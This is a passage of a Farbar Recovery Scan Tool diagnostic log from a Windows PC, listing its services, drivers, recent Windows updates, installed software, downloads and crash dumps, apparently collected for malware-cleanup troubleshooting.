R2 IpOverUsbSvc; C:\Program Files (x86)\Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\IpOverUsbSvc.exe [21304 2017-09-28] (Microsoft Corporation -> Microsoft Corporation)
R2 KiteService; C:\Program Files\Kite\KiteService.exe [141936 2020-10-14] (Manhattan Engineering Incorporated -> Kite)
S3 mracsvc; C:\Windows\System32\mracsvc.exe [20034712 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R2 PnkBstrA; C:\Windows\SysWOW64\PnkBstrA.exe [76888 2019-05-25] (Even Balance, Inc. -> )
S3 SwitchBoard; C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Test Signing Certificate -> Adobe Systems Incorporated) [File not signed]
S3 Te.Service; C:\Program Files (x86)\Windows Kits\10\Testing\Runtimes\TAEF\Wex.Services.exe [187904 2017-09-28] (Microsoft Corporation) [File not signed]
R2 TeamViewer; D:\Programy\TeamViewer\TeamViewer_Service.exe [13086224 2020-07-20] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-12] (Microsoft Corporation -> Microsoft Corporation)
R2 WsAppService; C:\Program Files (x86)\Wondershare\WAF\2.4.2.222\WsAppService.exe [474768 2017-03-01] (Wondershare software CO., LIMITED -> Wondershare)
R2 NvTelemetryContainer; "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe" -s NvTelemetryContainer -f "C:\ProgramData\NVIDIA\NvTelemetryContainer.log" -l 3 -d "C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\plugin"
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 CH341SER_A64; C:\Windows\System32\Drivers\CH341S64.SYS [69016 2019-03-04] (Microsoft Windows Hardware Compatibility Publisher -> www.winchiphead.com)
R1 HWiNFO32; C:\Windows\SysWOW64\drivers\HWiNFO64A.SYS [27552 2018-08-19] (Martin Malik - REALiX -> REALiX(tm))
R1 MpKslDrv; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{9477AFEC-D9BC-43C6-A41A-F6B028BF0EDC}\MpKslDrv.sys [47328 2020-10-22] (Microsoft Windows -> Microsoft Corporation)
S3 mracdrv; C:\Windows\System32\drivers\mracdrv.sys [19266680 2020-04-01] (Mail.Ru LLC -> LLC Mail.Ru)
R1 NetworkX; C:\Windows\System32\ckldrv.sys [30272 2010-03-19] (CrypKey (Canada) Inc. -> )
R1 npcap; C:\Windows\system32\DRIVERS\npcap.sys [60504 2020-04-04] (Insecure.Com LLC -> Insecure.Com LLC.)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [274776 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [117592 2017-01-12] (Microsoft Windows -> Microsoft Corporation)
S3 xb1usb; C:\Windows\System32\drivers\xb1usb.sys [42760 2019-03-31] (Windows Central Build Account - X -> Microsoft Corporation)
U4 npcap_wifi; no ImagePath
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One month (created) ===================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-23 10:44 - 2020-10-23 10:45 - 000030049 _____ C:\Users\Tomika\Desktop\FRST.txt
2020-10-23 10:44 - 2020-10-23 10:45 - 000000000 ____D C:\FRST
2020-10-23 10:42 - 2020-10-23 10:42 - 002299904 _____ (Farbar) C:\Users\Tomika\Desktop\FRST64.exe
2020-10-23 08:55 - 2020-10-23 08:55 - 000067246 _____ C:\Users\Tomika\Downloads\[SkT]Simon_Scarrow_-_serie_Quintus_Licinius_Cato_(2016-2020_CZ).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021972 _____ C:\Users\Tomika\Downloads\[SkT]Jozef_Karika__Cierny_kruh__Koniec_mafie_(2020)(SK).torrent
2020-10-23 08:54 - 2020-10-23 08:54 - 000021451 _____ C:\Users\Tomika\Downloads\[SkT]____Brian_W._Aldiss_-_Nonstop_(1989)(CZ).torrent
2020-10-23 08:40 - 2020-10-23 09:27 - 843273297 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip
2020-10-22 19:55 - 2020-10-22 20:09 - 061341305 _____ C:\Users\Tomika\Downloads\Flanagan, John - Hranicaruv ucen 10 - Cisar Nihon-Dzinu - (Audiokniha).rar.zip.crdownload
2020-10-19 21:47 - 2020-10-19 21:47 - 001013608 _____ C:\Users\Tomika\Downloads\sous vide review.pdf
2020-10-19 20:04 - 2020-10-19 20:04 - 000275000 _____ C:\Windows\Minidump\101920-50875-01.dmp
2020-10-17 19:31 - 2020-10-17 19:31 - 000420752 _____ C:\Windows\Minidump\101720-31906-01.dmp
2020-10-13 19:47 - 2020-09-30 09:20 - 000135240 _____ (Microsoft Corporation) C:\Windows\system32\gpapi.dll
2020-10-13 19:47 - 2020-09-30 05:04 - 003332608 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2020-10-13 19:47 - 2020-09-30 04:56 - 000445440 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2020-10-13 19:47 - 2020-09-30 04:48 - 001118720 _____ (Microsoft Corporation) C:\Windows\system32\gpedit.dll
2020-10-13 19:47 - 2020-09-30 04:15 - 001381888 _____ (Microsoft Corporation) C:\Windows\system32\gpsvc.dll
2020-10-13 19:47 - 2020-09-29 07:32 - 000115616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpapi.dll
2020-10-13 19:47 - 2020-09-29 06:11 - 003642368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2020-10-13 19:47 - 2020-09-29 06:00 - 000324096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2020-10-13 19:47 - 2020-09-29 05:54 - 001067520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gpedit.dll
2020-10-13 19:47 - 2020-09-24 08:47 - 000120832 _____ (Microsoft Corporation) C:\Windows\system32\userenv.dll
2020-10-13 19:47 - 2020-09-24 08:43 - 002535968 _____ (Microsoft Corporation) C:\Windows\system32\msxml6.dll
2020-10-13 19:47 - 2020-09-24 08:36 - 007363320 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2020-10-13 19:47 - 2020-09-24 08:36 - 002173392 _____ (Microsoft Corporation) C:\Windows\system32\combase.dll
2020-10-13 19:47 - 2020-09-24 08:01 - 025759232 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2020-10-13 19:47 - 2020-09-24 07:01 - 000098104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\userenv.dll
2020-10-13 19:47 - 2020-09-24 07:00 - 001902240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml6.dll
2020-10-13 19:47 - 2020-09-24 06:53 - 001561296 _____ (Microsoft Corporation) C:\Windows\SysWOW64\combase.dll
2020-10-13 19:47 - 2020-09-24 06:28 - 002914304 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000581120 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2020-10-13 19:47 - 2020-09-24 06:25 - 000088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 06:16 - 005500416 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2020-10-13 19:47 - 2020-09-24 06:14 - 000785408 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2020-10-13 19:47 - 2020-09-24 06:13 - 020293632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2020-10-13 19:47 - 2020-09-24 06:04 - 000517120 _____ (Microsoft Corporation) C:\Windows\system32\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:57 - 000498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2020-10-13 19:47 - 2020-09-24 05:55 - 000064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2020-10-13 19:47 - 2020-09-24 05:54 - 002306048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000477696 _____ (Microsoft Corporation) C:\Windows\system32\puiobj.dll
2020-10-13 19:47 - 2020-09-24 05:53 - 000092672 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:52 - 000145408 _____ (Microsoft Corporation) C:\Windows\system32\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:51 - 000315904 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 001033216 _____ (Microsoft Corporation) C:\Windows\system32\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:47 - 000653824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2020-10-13 19:47 - 2020-09-24 05:41 - 000262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:40 - 015494144 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000728064 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2020-10-13 19:47 - 2020-09-24 05:39 - 000484352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cmdial32.dll
2020-10-13 19:47 - 2020-09-24 05:39 - 000381952 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:38 - 000809472 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:37 - 002132992 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:33 - 003631616 _____ (Microsoft Corporation) C:\Windows\system32\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000392192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssph.dll
2020-10-13 19:47 - 2020-09-24 05:32 - 000272896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchProtocolHost.exe
2020-10-13 19:47 - 2020-09-24 05:31 - 000076800 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000279552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2020-10-13 19:47 - 2020-09-24 05:30 - 000128000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iepeers.dll
2020-10-13 19:47 - 2020-09-24 05:29 - 002750464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tquery.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000880640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcomm.dll
2020-10-13 19:47 - 2020-09-24 05:27 - 000230400 _____ (Microsoft Corporation) C:\Windows\system32\profsvc.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 004859904 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000699392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssvp.dll
2020-10-13 19:47 - 2020-09-24 05:26 - 000110080 _____ (Microsoft Corporation) C:\Windows\system32\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:25 - 004112384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2020-10-13 19:47 - 2020-09-24 05:23 - 000230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000696320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2020-10-13 19:47 - 2020-09-24 05:22 - 000333312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2020-10-13 19:47 - 2020-09-24 05:21 - 002058752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2020-10-13 19:47 - 2020-09-24 05:20 - 013872640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2020-10-13 19:47 - 2020-09-24 05:18 - 000172032 _____ (Microsoft Corporation) C:\Windows\system32\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:15 - 001566720 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:13 - 000092672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdSSDP.dll
2020-10-13 19:47 - 2020-09-24 05:10 - 000133120 _____ (Microsoft Corporation) C:\Windows\system32\mssprxy.dll
2020-10-13 19:47 - 2020-09-24 05:08 - 000905728 _____ (Microsoft Corporation) C:\Windows\system32\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 05:08 - 000145920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fdWSD.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 002551808 _____ (Microsoft Corporation) C:\Windows\system32\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:07 - 001099264 _____ (Microsoft Corporation) C:\Windows\system32\localspl.dll
2020-10-13 19:47 - 2020-09-24 05:06 - 000866304 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2020-10-13 19:47 - 2020-09-24 05:04 - 004387840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2020-10-13 19:47 - 2020-09-24 05:03 - 000801280 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 05:01 - 001920512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mssrch.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 001341952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2020-10-13 19:47 - 2020-09-24 05:00 - 000711168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SearchIndexer.exe
2020-10-13 19:47 - 2020-09-24 04:59 - 000710656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003826176 _____ (Microsoft Corporation) C:\Windows\system32\rdpcore.dll
2020-10-13 19:47 - 2020-09-24 04:55 - 003551744 _____ (Microsoft Corporation) C:\Windows\system32\rdpcorets.dll
2020-10-13 19:47 - 2020-09-24 04:53 - 001684992 _____ (Microsoft Corporation) C:\Windows\system32\workfolderssvc.dll
2020-10-13 19:47 - 2020-09-24 04:52 - 003278848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rdpcore.dll
2020-10-13 19:47 - 2020-09-15 09:06 - 001311776 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2020-10-13 19:47 - 2020-09-15 08:57 - 000325320 _____ (Microsoft Corporation) C:\Windows\system32\wintrust.dll
2020-10-13 19:47 - 2020-09-15 07:24 - 000245752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wintrust.dll
2020-10-13 19:47 - 2020-09-15 06:49 - 000281088 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\netbt.sys
2020-10-13 19:47 - 2020-09-15 06:15 - 001040384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2020-10-13 19:47 - 2020-09-11 18:31 - 000367616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\es.dll
2020-10-13 19:47 - 2020-09-11 11:39 - 000288768 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ks.sys
2020-10-13 19:47 - 2020-09-11 10:23 - 000516608 _____ (Microsoft Corporation) C:\Windows\system32\es.dll
2020-10-13 19:47 - 2020-09-11 01:49 - 001370680 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll
2020-10-13 19:47 - 2020-09-10 23:27 - 000564224 _____ (Microsoft Corporation) C:\Windows\system32\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000642560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apphelp.dll
2020-10-13 19:47 - 2020-09-10 22:51 - 000005632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shimeng.dll
2020-10-13 19:47 - 2020-09-10 22:20 - 001757184 _____ (Microsoft Corporation) C:\Windows\system32\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 22:14 - 002349056 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2020-10-13 19:47 - 2020-09-10 22:11 - 001088512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll
2020-10-13 19:47 - 2020-09-10 22:02 - 001495040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\GdiPlus.dll
2020-10-13 19:47 - 2020-09-10 21:56 - 001551360 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2020-10-13 19:47 - 2020-09-10 03:24 - 000353792 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrd3x40.dll
2020-10-13 19:34 - 2020-10-13 19:34 - 000275103 _____ C:\Users\Tomika\Downloads\STV-deti-2xA4_Slovenská-aikido-asociácia.pdf
2020-10-12 20:26 - 2020-10-12 20:26 - 000372610 _____ C:\Users\Tomika\Downloads\Vagnerová, Jana - Pandemie .epub
2020-10-10 11:10 - 2020-10-10 11:10 - 000000000 ____D C:\Users\Tomika\Downloads\menu_simple
2020-10-09 19:49 - 2020-10-09 21:16 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\PrusaSlicer
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\Users\Public\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000991 _____ C:\ProgramData\Desktop\PrusaSlicer.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\Users\Public\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000986 _____ C:\ProgramData\Desktop\Pronterface.lnk
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Prusa3D
2020-10-09 19:31 - 2020-10-09 19:31 - 000000000 ____D C:\Program Files\Prusa3D
2020-10-09 19:31 - 2015-09-23 13:12 - 000000625 _____ C:\Users\Tomika\printrunconf.ini
2020-10-09 19:30 - 2020-10-09 19:30 - 380393624 _____ (Prusa Research a.s. ) C:\Users\Tomika\Downloads\prusa3d_win_2_2_9_1.exe
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Mitov
2020-10-09 13:47 - 2020-10-09 13:47 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visuino
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Users\Tomika\Downloads\Visuino_7_8_3_69
2020-10-09 13:46 - 2020-10-09 13:46 - 000000000 ____D C:\Program Files (x86)\Mitov
2020-10-09 11:44 - 2020-10-09 11:44 - 010153506 _____ C:\Users\Tomika\Downloads\tandt4-two-buttons-or-rotary encoder=infinite-functions(menu+oled-display).zip
2020-10-07 22:00 - 2020-10-07 22:02 - 384825382 _____ C:\Users\Tomika\Downloads\Visuino_Component_SDK_7_8_3_69.zip
2020-10-07 22:00 - 2020-10-07 22:00 - 136887134 _____ C:\Users\Tomika\Downloads\Visuino_7_8_3_69.zip
2020-10-03 09:52 - 2020-10-03 09:52 - 000420816 _____ C:\Windows\Minidump\100320-13437-01.dmp
2020-10-02 19:07 - 2020-10-03 01:24 - 000000000 ____D C:\Program Files (x86)\Mozilla Thunderbird
2020-09-26 21:45 - 2020-09-26 21:45 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\InxileEntertainment
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\Users\Public\Desktop\Wasteland 3.lnk
2020-09-26 20:09 - 2020-09-26 20:09 - 000000535 _____ C:\ProgramData\Desktop\Wasteland 3.lnk
2020-09-25 16:20 - 2020-09-25 16:20 - 000000864 _____ C:\Users\Tomika\Desktop\They Are Billions.lnk
2020-09-23 19:01 - 2020-09-23 19:01 - 000420816 _____ C:\Windows\Minidump\092320-26531-01.dmp
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-23 10:08 - 2016-05-02 19:14 - 000003596 _____ C:\Windows\system32\Tasks\Optimize Start Menu Cache Files-S-1-5-21-2643689781-145595849-2857803826-1001
2020-10-23 10:02 - 2020-01-15 19:52 - 000000000 ____D C:\Program Files\Blender Foundation
2020-10-23 10:02 - 2019-09-04 21:41 - 000001135 _____ C:\Users\Tomika\Desktop\blender.lnk
2020-10-23 10:02 - 2019-09-04 21:41 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender
2020-10-23 09:58 - 2017-11-21 00:03 - 000000000 ____D C:\Users\Tomika\AppData\LocalLow\Mozilla
2020-10-23 09:56 - 2016-06-10 09:37 - 000000000 ____D C:\Users\Tomika\AppData\Local\Autodesk
2020-10-23 09:49 - 2016-05-04 19:07 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\qBittorrent
2020-10-23 08:30 - 2020-01-01 16:07 - 000003088 _____ C:\Windows\system32\Tasks\Driver Booster Scheduler
2020-10-23 08:30 - 2020-01-01 16:07 - 000003080 _____ C:\Windows\system32\Tasks\Driver Booster Update
2020-10-23 08:30 - 2020-01-01 16:07 - 000002836 _____ C:\Windows\system32\Tasks\Driver Booster SkipUAC (Tomika)
2020-10-23 08:28 - 2017-09-16 12:00 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\WTablet
2020-10-23 08:28 - 2016-05-15 19:42 - 000000000 ____D C:\ProgramData\NVIDIA
2020-10-23 08:28 - 2016-05-02 19:13 - 000000000 __SHD C:\Users\Tomika\IntelGraphicsProfiles
2020-10-22 23:35 - 2019-10-04 15:37 - 000000000 ___HD C:\Users\Public\Documents\AdobeGCData
2020-10-22 23:35 - 2019-10-04 15:37 - 000000000 ___HD C:\ProgramData\Documents\AdobeGCData
2020-10-22 23:00 - 2013-09-30 06:20 - 000865068 _____ C:\Windows\system32\PerfStringBackup.INI
2020-10-22 23:00 - 2013-08-22 15:36 - 000000000 ____D C:\Windows\Inf
2020-10-22 22:46 - 2018-05-09 19:01 - 000000000 ____D C:\Users\Tomika\Downloads\mil
2020-10-22 22:11 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\NDF
2020-10-22 00:39 - 2016-05-02 19:13 - 000795000 ____N (Microsoft Corporation) C:\Windows\system32\MpSigStub.exe
2020-10-21 20:09 - 2019-05-29 18:57 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-21 20:08 - 2018-12-09 17:49 - 000000948 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-21 20:08 - 2016-05-03 12:54 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-10-21 19:55 - 2016-05-02 19:23 - 000002244 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-21 19:55 - 2016-05-02 19:23 - 000002203 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-20 20:06 - 2013-08-22 15:25 - 000000187 _____ C:\Windows\win.ini
2020-10-20 20:05 - 2013-08-22 16:45 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2020-10-19 22:51 - 2016-05-02 19:09 - 000000000 ____D C:\Users\Tomika
2020-10-19 20:04 - 2020-03-13 18:40 - 1137619341 _____ C:\Windows\MEMORY.DMP
2020-10-19 20:04 - 2016-05-03 12:49 - 000000000 ____D C:\Windows\Minidump
2020-10-18 23:11 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\discord
2020-10-17 15:03 - 2020-03-23 23:02 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Code
2020-10-17 12:48 - 2020-03-23 23:17 - 000000000 ____D C:\Users\Tomika\.pylint.d
2020-10-17 12:03 - 2020-09-08 21:25 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Kite
2020-10-17 11:47 - 2020-03-23 23:01 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Visual Studio Code
2020-10-16 19:58 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\AppReadiness
2020-10-16 19:46 - 2020-09-08 21:24 - 000000000 ____D C:\Program Files\Kite
2020-10-16 12:00 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\rescache
2020-10-16 10:01 - 2020-03-04 22:12 - 000000000 ____D C:\Users\Tomika\AppData\Local\Arduino15
2020-10-16 09:28 - 2016-05-02 19:04 - 000103424 ____N C:\Windows\Minidump\101620-10890-01.dmp
2020-10-15 21:58 - 2016-05-02 19:22 - 000003386 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 21:58 - 2016-05-02 19:22 - 000003258 _____ C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 23:09 - 2013-08-22 15:25 - 000262144 ___SH C:\Windows\system32\config\BBI
2020-10-13 23:08 - 2013-08-22 17:36 - 000000000 ___RD C:\Windows\ToastData
2020-10-13 20:29 - 2013-08-22 17:20 - 000000000 ____D C:\Windows\CbsTemp
2020-10-13 19:44 - 2019-01-01 12:24 - 000004466 _____ C:\Windows\system32\Tasks\Adobe Flash Player PPAPI Notifier
2020-10-13 19:44 - 2019-01-01 12:24 - 000004324 _____ C:\Windows\system32\Tasks\Adobe Flash Player Updater
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2020-10-13 19:44 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\Macromed
2020-10-09 19:32 - 2016-05-08 15:48 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-09 00:17 - 2019-10-03 22:39 - 000003450 _____ C:\Windows\system32\Tasks\AdobeGCInvoker-1.0
2020-10-06 22:55 - 2016-05-26 22:56 - 000002296 ____H C:\Users\Tomika\Documents\Default.rdp
2020-10-06 22:54 - 2013-08-22 17:36 - 000000000 ____D C:\Windows\system32\FxsTmp
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Atom
2020-10-04 19:26 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\.atom
2020-10-04 16:41 - 2020-03-07 15:26 - 000000000 ____D C:\Users\Tomika\.platformio
2020-10-04 16:30 - 2019-08-11 21:57 - 000002117 _____ C:\Users\Tomika\Desktop\Atom.lnk
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GitHub, Inc
2020-10-04 16:30 - 2019-08-11 21:57 - 000000000 ____D C:\Users\Tomika\AppData\Local\atom
2020-10-04 12:49 - 2020-05-05 19:43 - 000002173 _____ C:\Users\Tomika\Desktop\Discord.lnk
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Discord Inc
2020-10-04 12:49 - 2020-05-05 19:43 - 000000000 ____D C:\Users\Tomika\AppData\Local\Discord
2020-10-03 13:40 - 2016-12-17 10:05 - 000004476 _____ C:\Windows\system32\Tasks\Adobe Acrobat Update Task
2020-10-03 01:24 - 2019-10-12 10:45 - 000001221 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Thunderbird.lnk
2020-10-02 22:58 - 2013-08-22 17:38 - 000835472 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerApp.exe
2020-10-02 22:58 - 2013-08-22 17:38 - 000179608 _____ (Adobe) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-26 21:46 - 2016-11-19 00:31 - 000000000 ____D C:\Users\Tomika\Documents\My Games
2020-09-26 21:21 - 2017-07-14 22:38 - 000000000 ____D C:\Windows\SysWOW64\directx
2020-09-25 15:51 - 2017-09-17 20:13 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Backup and Sync from Google
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\Users\Public\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002016 _____ C:\ProgramData\Desktop\Google Slides.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\Users\Public\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002014 _____ C:\ProgramData\Desktop\Google Sheets.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\Users\Public\Desktop\Google Docs.lnk
2020-09-25 15:51 - 2016-05-22 22:53 - 000002004 _____ C:\ProgramData\Desktop\Google Docs.lnk
==================== Files in the root of some directories ========
2016-05-08 17:11 - 2020-08-20 21:11 - 000000034 _____ () C:\Users\Tomika\AppData\Roaming\AdobeWLCMCache.dat
